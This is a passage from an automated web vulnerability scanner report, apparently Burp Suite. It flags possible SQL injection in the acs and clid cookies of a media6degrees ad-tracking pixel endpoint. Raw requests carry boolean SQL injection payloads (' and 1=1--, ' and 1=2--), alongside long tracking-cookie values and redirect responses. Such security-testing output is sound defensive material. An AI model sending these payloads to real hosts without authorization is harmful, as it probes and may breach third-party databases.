vstcnt=417k020o01dfngheqnlsvaqf150v10l20r1w4exqe103210524qhoq103210524slly127p20f20g24exp6103210e249v4u10pj10e24ru4y103210722te10tq10a24f69z103210f24n86o103210d24pq44103210a24eflo218e104203210724na8i103210e24eyja103210e24f204103210524mqca103210e24nsyl103210f24l16a218e10f203210l24fz24103210924bgpn103210524o3dr103210l24cj2d103210224e1a9103210l24gqhl103210924d3rk10pj10m23sti21hj10a203210e24g197103210524ns52103210l24fqsv103210l24nnav103210f22wb11m520l20m24uzg6218e100203220020324tfmw103210b24flbl103210424qpgs103210324tc6l103210e24f5tg103210324tmhw103210924q8ci103210l24m4sm103210524elor218e10l203210m24uu1v103210m24f9wk103210i24jxig103210f24fvio218e20e20f203210f24uzpw218e10f203210l24eo2u103210624e8bw10321082496o0103210l24fsuv103210924fduc218e10a203210e24ef19103210l24uzdp103210b24dret103210724e9pa10321042451gt10pj10e24styu103210924cnyl103210g24er21103210m24o2lt103210a24fj52103210924m1v2103210a23eoh127p10l24f7qr218e108203210924fgv9218e108203210a24qnab103210023l4f103210a24kd6k103210c24hqyp103210i2

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=016020a0e0f0g0h1ljtllpxzt117v6hxzt1tr37xzt1tr37xzt117v6hxzt117rw8; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 16:07:18 GMT; Path=/
Set-Cookie: adh="1lkkxr8160a4ka20103r018twhJPTGt00gg5452rf011et018qzlZAsw500gg2f52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh17v6h01p3n080k0s51b; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 16:07:18 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=4330pahlkze3o0000000j3n08157olkxlm50000000r3n08144qlkze3o0000000j3n0813y7lkze3o0000000j3n080hsnlkze3o0000000j3n0815sklkkpqq000000143n0812nslkxrxz0000000l3n0812gdlkkyy0000000103n080morlkkxrb000000113n0814k6lkxlm50000000r3n080w35lkze3o0000000j3n0813pylkze3o0000000j3n0814rwlkxlm50000000r3n081628lkze3y0000000h3n08132dlkzsmp0000000a3n0814khlkxlm50000000r3n081196lkkkbe0000001a3n0813x4lkxrxz0000000l3n08106sll1gs6000000013n0113qmlkze3y0000000h3n081195lkkpqh000000153n081194lkkjj40000001b3n0816nulkxlm50000000r3n0813q8lkze3y0000000h3n081193lkkplo000000173n081192lkkpke000000193n080p46lkkpqq000000143n080zg4lkze3y0000000h3n08144elkze3o0000000j3n0813qwlkze4r0000000g3n0810poljyxb40000001m3n08106llkzt2k000000093n080e6llkl0r50000000x3n0816dnlkze3o0000000j3n08138olkxrxz0000000l3n0816y4ll1dpj000000043n04167ulkxq410000000m3n08159olk8fax0000001h3n0814qllkxlm50000000r3n0815halkxlm50000000r3n080m0plkkxrb000000113n0816e6lkxnbq0000000q3n0813zblkze3y0000000h3n0814xnlkxlm50000000r3n0816dxlkze3o0000000j3n081391lkxrxz0000000l3n0815zhlkze3y0000000h3n081672lkkxrb000000113n080ycrlkncow0000000v3n080okclkze3o0000000j3n08158mlkze3o0000000j3n081015lkze3y0000000h3n0813lelkxrxz0000000l3n0813yolkze3o0
...[SNIP]...

Request 2

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fwww.medicinenet.com%2fpink_eye%2farticle.htm HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt117s3uxzt1tr37xzt1tr37xzt117s3uxzt117rw8'%20and%201%3d2--%20; adh=1lkkxr8160a4ka20103r018twhJPTGt00gg5452rf011et018qzlZAsw500gg2f52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh17san01o3n070k0r51a; rdrlst=4320pahlkze3o0000000i3n07144qlkze3o0000000i3n07157olkxlm50000000q3n0713y7lkze3o0000000i3n0715sklkkpqq000000133n070hsnlkze3o0000000i3n0712nslkxrxz0000000k3n0712gdlkkyy00000000z3n070morlkkxrb000000103n0714k6lkxlm50000000q3n070w35lkze3o0000000i3n0713pylkze3o0000000i3n0714rwlkxlm50000000q3n071628lkze3y0000000g3n07132dlkzsmp000000093n0714khlkxlm50000000q3n071196lkkkbe000000193n0713x4lkxrxz0000000k3n0713qmlkze3y0000000g3n071195lkkpqh000000143n071194lkkjj40000001a3n0716nulkxlm50000000q3n0713q8lkze3y0000000g3n071193lkkplo000000163n070p46lkkpqq000000133n071192lkkpke000000183n070zg4lkze3y0000000g3n0713qwlkze4r0000000f3n07144elkze3o0000000i3n0710poljyxb40000001l3n070e6llkl0r50000000w3n07106llkzt2k000000083n07138olkxrxz0000000k3n0716dnlkze3o0000000i3n0716y4ll1dpj000000033n03167ulkxq410000000l3n0714qllkxlm50000000q3n07159olk8fax0000001g3n0715halkxlm50000000q3n070m0plkkxrb000000103n0716e6lkxnbq0000000p3n0713zblkze3y0000000g3n0714xnlkxlm50000000q3n0716dxlkze3o0000000i3n071391lkxrxz0000000k3n071672lkkxrb000000103n0715zhlkze3y0000000g3n070ycrlkncow0000000u3n070okclkze3o0000000i3n07158mlkze3o0000000i3n071015lkze3y0000000g3n0713lelkxrxz0000000k3n0713yolkze3o0000000i3n070ojulkze3o0000000i3n071240lkxrxz0000000k3n0714ozlkxlm50000000q3n0714bmlkxrxz0000000k3n071590lkzsm20000000a3n0714j7lkxlm50000000q3n0714bzlkxlm50000000q3n0711pjlkxrxz0000000k3n070p01lkze3o0000000i3n0715holkxlm50000000q3n070m7alkkxrb000000103n0713mklkxrxz0000000k3n07101ulkze3o0000000i3n0712zglkxrxz0000000k3n0713lxlkxrxz0000000k3n070zp4lkze3o0000000i3n07148ilkxlm50000000q3n070xvclkze3o0000000i3n0716sjll1dpj000000033n0312yxlkxrxz0000000k3n0715iglkxq0l0000000m3n0713n7lkze3y0000000g3n0716s2lkxpyu0000000n3n0714hplkxlm50000000q3n070znmlk34620000001j3n0714hclkxlm50000000q3n070wd7lkze3o0000000i3n07102plkxrxz0000000k3n0710tylkkpku000000173n070p1alkze3o0000000i3n0700bvlk9pe80000001f3n0715xylk60qe0000001i3n0710lxlkxrxz0000000k3n07103blkxrxz0000000k3n0710telkd7nq0000001d3n0716rslkxppm0000000o3n070c9slk9pe80000001f3n0713mxlkze3o0000000i3n0712emlkze3o0000000i3n0710rdlkdkly0000001b3n070z9zlkze3y0000000g3n07163plkxlm50000000q3n070z9xlkze3o0000000i3n070m40lkkxrb000000103n070zqylkxrxz0000000k3n070mjelkkxrb000000103n0712qnlkkplt000000153n0712x6lkxrxz0000000k3n0714e9lkze3o0000000i3n071342lkze3y0000000g3n0716aulkze3o0000000i3n0716atlkxlm50000000q3n071203lkb5u20000001e3n07163clkxlm50000000q3n070afqlkze3o0000000i3n070o0vlkkpqx000000123n070z2ilkkxrb000000103n07; sglst=2280sbpelkxlm5026sw00f3m000k00500dsnlkxlm503s3e00q3n070k0q50qarllkxlm503s3e00q3n070k0q50qcg5lkxlm5026sw00q3n070k0q50q9rslkkpke0go550183n070k0r518am5lkkxr8002zw0113n070k0r511cd4lkxlm5026sw00f3m000k00500crglkxlm5026sw00q3n070k0q50qcnolkxlm5026sw00q3n070k0q50qabelkxlm5026sw00q3n070k0q50qdd8lkxlm5026sw00f3m000k00500cy2lkxlm5026sw00q3n070k0q50qaoplkb5u209jqc0063e000j00500cnxlkxlm503s3e00q3n070k0q50qe3qll1dpj000000033n030k03503bq3lkxlm5026sw00q3n070k0q50qbvplkxlm5026sw00f3m000k00500aoilkxlm503s3e00n3n000k00500942lkb5u20mfs300o3l000k005008ndlkb5u20mfs300o3l000k005009ullkxlm503s3e00n3n000k00500bvclkxlm5026sw00q3n070k0q50qc5flkxlm5026sw00q3n070k0q50q56blkb5u20mfs300o3l000k00500bjqlkxlm5026sw00q3n070k0q50qawklkxlm5026sw00q3n070k0q50qasulkb5u209jqc0063e000j00500crplkxlm503s3e00n3n000k00500asqlkxlm5026sw00q3n070k0q50qc5rlkov6e0000000t3n070k0r50taw8lkxlm503s3e00q3n070k0q50qc60lkxlm5026sw00q3n070k0q50qdc4lkxlm5026sw00q3n070k0q50qd26lkxlm5026sw00q3n070k0q50qdnjlkxlm503s3e00q3n070k0q50qcbclkxlm5026sw00q3n070k0q50qc85lkxlm5026sw00q3n070k0q50qcsslkxlm503s3e00q3n070k0q50qc80lkb5u209jqc0063e000j00500ag2lkd7nq0o68m01d3n070k0r51ac1elkxlm5026sw00q3n070k0q50qc81lkkpke0cw1r00i3l000k005009grlkxlm5026sw00q3n070k0q50qc8flkxlm5026sw00q3n070k0q50qa6slkkpke0cw1r00i3l000k00500dnalkxlm5026sw00q3n070k0q50q9z6lkxlm5026sw00q3n070k0q50qdbtlkxlm5026sw00q3n070k0q50q9q4lkxlm5026sw00q3n070k0q50qdyllkxlm5026sw00q3n070k0q50q0kllklhm40c4010053l000k005009q5lkb5u20mfs300o3l000k00500b3zlkxlm503s3e00n3n000k005000t7ljyxb412gl801l3n070k0r51adgflkkpke0f2un0183n070k0r5189mjlkxlm5026sw00f3m000k00500bo0lkb5u20q7vh01b3n000k00500bo1lkkyy00cmo50093l000k005009pglkxlm5026sw00q3n070k0q50qcwalkxlm5026sw00q3n070k0q50qd86lklhm40c4010053l000k00500d84lkxlm5026sw00q3n070k0q50qdqllkxlm5026sw00q3n070k0q50qdz3lkxlm5026sw00f3m000k00500cm6lkxlm5026sw00q3n070k0q50qcxdlkxlm503s3e00q3n070k0q50q719lkb5u20omkz00w3n070k0q50r71alkkpke0cw1r00i3l000k00500ctplkxlm5026sw00q3n070k0q50qcc3lkxlm5026sw00q3n070k0q50qdgilkb5u209jqc0063e000j00500cthlkxlm5026sw00q3n070k0q50q4wclkb5u20q7vh00t3n000k005005mrlkb5u20mfs300o3l000k00500a0ulkxlm503s3e00n3n000k00500arilkxlm5026sw00f3m000k00500e0yll1dpj000000033n030k03503bwjlkkyy00gerj00z3n070k0r50zcbplkxlm5026sw00q3n070k0q50q9gelkxlm503s3e00n3n000k00500; vstcnt=417k020o01dfngheqnlsvaqf150v10l20r1w4exqe103210524qhoq103210524slly127p20f20g24exp6103210e249v4u10pj10e24ru4y103210722te10tq10a24f69z103210f24n86o103210d24pq44103210a24eflo218e104203210724na8i103210e24eyja103210e24f204103210524mqca103210e24nsyl103210f24l16a218e10f203210l24fz24103210924bgpn103210524o3dr103210l24cj2d103210224e1a9103210l24gqhl103210924d3rk10pj10m23sti21hj10a203210e24g197103210524ns52103210l24fqsv103210l24nnav103210f22wb11m520l20m24uzg6218e100203220020324tfmw103210b24flbl103210424qpgs103210324tc6l103210e24f5tg103210324tmhw103210924q8ci103210l24m4sm103210524elor218e10l203210m24uu1v103210m24f9wk103210i24jxig103210f24fvio218e20e20f203210f24uzpw218e10f203210l24eo2u103210624e8bw10321082496o0103210l24fsuv103210924fduc218e10a203210e24ef19103210l24uzdp103210b24dret103210724e9pa10321042451gt10pj10e24styu103210924cnyl103210g24er21103210m24o2lt103210a24fj52103210924m1v2103210a23eoh127p10l24f7qr218e108203210924fgv9218e108203210a24qnab103210023l4f103210a24kd6k103210c24hqyp103210i2

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lkkxr8160a4ka20103r018twhJPTGt00gg5452rf011et018qzlZAsw500gg2f52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh17v6i01p3n080k0s51b; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 16:07:19 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=4330pahlkze3o0000000j3n08157olkxlm50000000r3n08144qlkze3o0000000j3n0813y7lkze3o0000000j3n080hsnlkze3o0000000j3n0815sklkkpqq000000143n0812nslkxrxz0000000l3n0812gdlkkyy0000000103n080morlkkxrb000000113n0814k6lkxlm50000000r3n080w35lkze3o0000000j3n0813pylkze3o0000000j3n0814rwlkxlm50000000r3n081628lkze3y0000000h3n08132dlkzsmp0000000a3n0814khlkxlm50000000r3n081196lkkkbe0000001a3n0813x4lkxrxz0000000l3n08106sll1gs7000000013n0113qmlkze3y0000000h3n081195lkkpqh000000153n081194lkkjj40000001b3n0816nulkxlm50000000r3n0813q8lkze3y0000000h3n081193lkkplo000000173n081192lkkpke000000193n080p46lkkpqq000000143n080zg4lkze3y0000000h3n08144elkze3o0000000j3n0813qwlkze4r0000000g3n0810poljyxb40000001m3n08106llkzt2k000000093n080e6llkl0r50000000x3n0816dnlkze3o0000000j3n08138olkxrxz0000000l3n0816y4ll1dpj000000043n04167ulkxq410000000m3n08159olk8fax0000001h3n0814qllkxlm50000000r3n0815halkxlm50000000r3n080m0plkkxrb000000113n0816e6lkxnbq0000000q3n0813zblkze3y0000000h3n0814xnlkxlm50000000r3n0816dxlkze3o0000000j3n081391lkxrxz0000000l3n0815zhlkze3y0000000h3n081672lkkxrb000000113n080ycrlkncow0000000v3n080okclkze3o0000000j3n08158mlkze3o0000000j3n081015lkze3y0000000h3n0813lelkxrxz0000000l3n0813yolkze3o0000000j3n080ojulkze3o0000000j3n081240lkxrxz0000000l3n0814ozlkxlm50000000r3n0814bmlkxrxz0000000l3n081590lkzsm20000000b3n0814j7lkxlm50000000r3n0814bzlkxlm5000
...[SNIP]...

1.13. http://cspix.media6degrees.com/orbserv/hbpix [clid cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The clid cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the clid cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fwww.medicinenet.com%2fpink_eye%2farticle.htm HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt117s3uxzt1tr37xzt1tr37xzt117s3uxzt117rw8; adh=1lkkxr8160a4ka20103r018twhJPTGt00gg5452rf011et018qzlZAsw500gg2f52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh17san01o3n070k0r51a'%20and%201%3d1--%20; rdrlst=4320pahlkze3o0000000i3n07144qlkze3o0000000i3n07157olkxlm50000000q3n0713y7lkze3o0000000i3n0715sklkkpqq000000133n070hsnlkze3o0000000i3n0712nslkxrxz0000000k3n0712gdlkkyy00000000z3n070morlkkxrb000000103n0714k6lkxlm50000000q3n070w35lkze3o0000000i3n0713pylkze3o0000000i3n0714rwlkxlm50000000q3n071628lkze3y0000000g3n07132dlkzsmp000000093n0714khlkxlm50000000q3n071196lkkkbe000000193n0713x4lkxrxz0000000k3n0713qmlkze3y0000000g3n071195lkkpqh000000143n071194lkkjj40000001a3n0716nulkxlm50000000q3n0713q8lkze3y0000000g3n071193lkkplo000000163n070p46lkkpqq000000133n071192lkkpke000000183n070zg4lkze3y0000000g3n0713qwlkze4r0000000f3n07144elkze3o0000000i3n0710poljyxb40000001l3n070e6llkl0r50000000w3n07106llkzt2k000000083n07138olkxrxz0000000k3n0716dnlkze3o0000000i3n0716y4ll1dpj000000033n03167ulkxq410000000l3n0714qllkxlm50000000q3n07159olk8fax0000001g3n0715halkxlm50000000q3n070m0plkkxrb000000103n0716e6lkxnbq0000000p3n0713zblkze3y0000000g3n0714xnlkxlm50000000q3n0716dxlkze3o0000000i3n071391lkxrxz0000000k3n071672lkkxrb000000103n0715zhlkze3y0000000g3n070ycrlkncow0000000u3n070okclkze3o0000000i3n07158mlkze3o0000000i3n071015lkze3y0000000g3n0713lelkxrxz0000000k3n0713yolkze3o0000000i3n070ojulkze3o0000000i3n071240lkxrxz0000000k3n0714ozlkxlm50000000q3n0714bmlkxrxz0000000k3n071590lkzsm20000000a3n0714j7lkxlm50000000q3n0714bzlkxlm50000000q3n0711pjlkxrxz0000000k3n070p01lkze3o0000000i3n0715holkxlm50000000q3n070m7alkkxrb000000103n0713mklkxrxz0000000k3n07101ulkze3o0000000i3n0712zglkxrxz0000000k3n0713lxlkxrxz0000000k3n070zp4lkze3o0000000i3n07148ilkxlm50000000q3n070xvclkze3o0000000i3n0716sjll1dpj000000033n0312yxlkxrxz0000000k3n0715iglkxq0l0000000m3n0713n7lkze3y0000000g3n0716s2lkxpyu0000000n3n0714hplkxlm50000000q3n070znmlk34620000001j3n0714hclkxlm50000000q3n070wd7lkze3o0000000i3n07102plkxrxz0000000k3n0710tylkkpku000000173n070p1alkze3o0000000i3n0700bvlk9pe80000001f3n0715xylk60qe0000001i3n0710lxlkxrxz0000000k3n07103blkxrxz0000000k3n0710telkd7nq0000001d3n0716rslkxppm0000000o3n070c9slk9pe80000001f3n0713mxlkze3o0000000i3n0712emlkze3o0000000i3n0710rdlkdkly0000001b3n070z9zlkze3y0000000g3n07163plkxlm50000000q3n070z9xlkze3o0000000i3n070m40lkkxrb000000103n070zqylkxrxz0000000k3n070mjelkkxrb000000103n0712qnlkkplt000000153n0712x6lkxrxz0000000k3n0714e9lkze3o0000000i3n071342lkze3y0000000g3n0716aulkze3o0000000i3n0716atlkxlm50000000q3n071203lkb5u20000001e3n07163clkxlm50000000q3n070afqlkze3o0000000i3n070o0vlkkpqx000000123n070z2ilkkxrb000000103n07; sglst=2280sbpelkxlm5026sw00f3m000k00500dsnlkxlm503s3e00q3n070k0q50qarllkxlm503s3e00q3n070k0q50qcg5lkxlm5026sw00q3n070k0q50q9rslkkpke0go550183n070k0r518am5lkkxr8002zw0113n070k0r511cd4lkxlm5026sw00f3m000k00500crglkxlm5026sw00q3n070k0q50qcnolkxlm5026sw00q3n070k0q50qabelkxlm5026sw00q3n070k0q50qdd8lkxlm5026sw00f3m000k00500cy2lkxlm5026sw00q3n070k0q50qaoplkb5u209jqc0063e000j00500cnxlkxlm503s3e00q3n070k0q50qe3qll1dpj000000033n030k03503bq3lkxlm5026sw00q3n070k0q50qbvplkxlm5026sw00f3m000k00500aoilkxlm503s3e00n3n000k00500942lkb5u20mfs300o3l000k005008ndlkb5u20mfs300o3l000k005009ullkxlm503s3e00n3n000k00500bvclkxlm5026sw00q3n070k0q50qc5flkxlm5026sw00q3n070k0q50q56blkb5u20mfs300o3l000k00500bjqlkxlm5026sw00q3n070k0q50qawklkxlm5026sw00q3n070k0q50qasulkb5u209jqc0063e000j00500crplkxlm503s3e00n3n000k00500asqlkxlm5026sw00q3n070k0q50qc5rlkov6e0000000t3n070k0r50taw8lkxlm503s3e00q3n070k0q50qc60lkxlm5026sw00q3n070k0q50qdc4lkxlm5026sw00q3n070k0q50qd26lkxlm5026sw00q3n070k0q50qdnjlkxlm503s3e00q3n070k0q50qcbclkxlm5026sw00q3n070k0q50qc85lkxlm5026sw00q3n070k0q50qcsslkxlm503s3e00q3n070k0q50qc80lkb5u209jqc0063e000j00500ag2lkd7nq0o68m01d3n070k0r51ac1elkxlm5026sw00q3n070k0q50qc81lkkpke0cw1r00i3l000k005009grlkxlm5026sw00q3n070k0q50qc8flkxlm5026sw00q3n070k0q50qa6slkkpke0cw1r00i3l000k00500dnalkxlm5026sw00q3n070k0q50q9z6lkxlm5026sw00q3n070k0q50qdbtlkxlm5026sw00q3n070k0q50q9q4lkxlm5026sw00q3n070k0q50qdyllkxlm5026sw00q3n070k0q50q0kllklhm40c4010053l000k005009q5lkb5u20mfs300o3l000k00500b3zlkxlm503s3e00n3n000k005000t7ljyxb412gl801l3n070k0r51adgflkkpke0f2un0183n070k0r5189mjlkxlm5026sw00f3m000k00500bo0lkb5u20q7vh01b3n000k00500bo1lkkyy00cmo50093l000k005009pglkxlm5026sw00q3n070k0q50qcwalkxlm5026sw00q3n070k0q50qd86lklhm40c4010053l000k00500d84lkxlm5026sw00q3n070k0q50qdqllkxlm5026sw00q3n070k0q50qdz3lkxlm5026sw00f3m000k00500cm6lkxlm5026sw00q3n070k0q50qcxdlkxlm503s3e00q3n070k0q50q719lkb5u20omkz00w3n070k0q50r71alkkpke0cw1r00i3l000k00500ctplkxlm5026sw00q3n070k0q50qcc3lkxlm5026sw00q3n070k0q50qdgilkb5u209jqc0063e000j00500cthlkxlm5026sw00q3n070k0q50q4wclkb5u20q7vh00t3n000k005005mrlkb5u20mfs300o3l000k00500a0ulkxlm503s3e00n3n000k00500arilkxlm5026sw00f3m000k00500e0yll1dpj000000033n030k03503bwjlkkyy00gerj00z3n070k0r50zcbplkxlm5026sw00q3n070k0q50q9gelkxlm503s3e00n3n000k00500; vstcnt=417k020o01dfngheqnlsvaqf150v10l20r1w4exqe103210524qhoq103210524slly127p20f20g24exp6103210e249v4u10pj10e24ru4y103210722te10tq10a24f69z103210f24n86o103210d24pq44103210a24eflo218e104203210724na8i103210e24eyja103210e24f204103210524mqca103210e24nsyl103210f24l16a218e10f203210l24fz24103210924bgpn103210524o3dr103210l24cj2d103210224e1a9103210l24gqhl103210924d3rk10pj10m23sti21hj10a203210e24g197103210524ns52103210l24fqsv103210l24nnav103210f22wb11m520l20m24uzg6218e100203220020324tfmw103210b24flbl103210424qpgs103210324tc6l103210e24f5tg103210324tmhw103210924q8ci103210l24m4sm103210524elor218e10l203210m24uu1v103210m24f9wk103210i24jxig103210f24fvio218e20e20f203210f24uzpw218e10f203210l24eo2u103210624e8bw10321082496o0103210l24fsuv103210924fduc218e10a203210e24ef19103210l24uzdp103210b24dret103210724e9pa10321042451gt10pj10e24styu103210924cnyl103210g24er21103210m24o2lt103210a24fj52103210924m1v2103210a23eoh127p10l24f7qr218e108203210924fgv9218e108203210a24qnab103210023l4f103210a24kd6k103210c24hqyp103210i2

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=016020a0e0f0g0h1ljtllpxzt117v98xzt1tr37xzt1tr37xzt117v98xzt117rw8; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 16:08:57 GMT; Path=/
Set-Cookie: adh="1lkkxr8160a4ka20103r018twhJPTGt00gg5452rf011et018qzlZAsw500gg2f52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh17v9801p3n080k0s51b; Domain=media6degrees.com; Expires=Mon, 07-Nov-2011 16:08:57 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=4330pahlkze3o0000000j3n08157olkxlm50000000r3n08144qlkze3o0000000j3n0813y7lkze3o0000000j3n080hsnlkze3o0000000j3n0815sklkkpqq000000143n0812nslkxrxz0000000l3n0812gdlkkyy0000000103n080morlkkxrb000000113n0814k6lkxlm50000000r3n080w35lkze3o0000000j3n0813pylkze3o0000000j3n0814rwlkxlm50000000r3n081628lkze3y0000000h3n08132dlkzsmp0000000a3n0814khlkxlm50000000r3n081196lkkkbe0000001a3n0813x4lkxrxz0000000l3n08106sll1gux000000013n0113qmlkze3y0000000h3n081195lkkpqh000000153n081194lkkjj40000001b3n0816nulkxlm50000000r3n0813q8lkze3y0000000h3n081193lkkplo000000173n081192lkkpke000000193n080p46lkkpqq000000143n080zg4lkze3y0000000h3n08144elkze3o0000000j3n0813qwlkze4r0000000g3n0810poljyxb40000001m3n08106llkzt2k000000093n080e6llkl0r50000000x3n0816dnlkze3o0000000j3n08138olkxrxz0000000l3n0816y4ll1dpj000000043n04167ulkxq410000000m3n08159olk8fax0000001h3n0814qllkxlm50000000r3n0815halkxlm50000000r3n080m0plkkxrb000000113n0816e6lkxnbq0000000q3n0813zblkze3y0000000h3n0814xnlkxlm50000000r3n0816dxlkze3o0000000j3n081391lkxrxz0000000l3n0815zhlkze3y0000000h3n081672lkkxrb000000113n080ycrlkncow0000000v3n080okclkze3o0000000j3n08158mlkze3o0000000j3n081015lkze3y0000000h3n0813lelkxrxz0000000l3n0813yolkze3o0
...[SNIP]...

Request 2

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fwww.medicinenet.com%2fpink_eye%2farticle.htm HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt117s3uxzt1tr37xzt1tr37xzt117s3uxzt117rw8; adh=1lkkxr8160a4ka20103r018twhJPTGt00gg5452rf011et018qzlZAsw500gg2f52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh17san01o3n070k0r51a'%20and%201%3d2--%20; 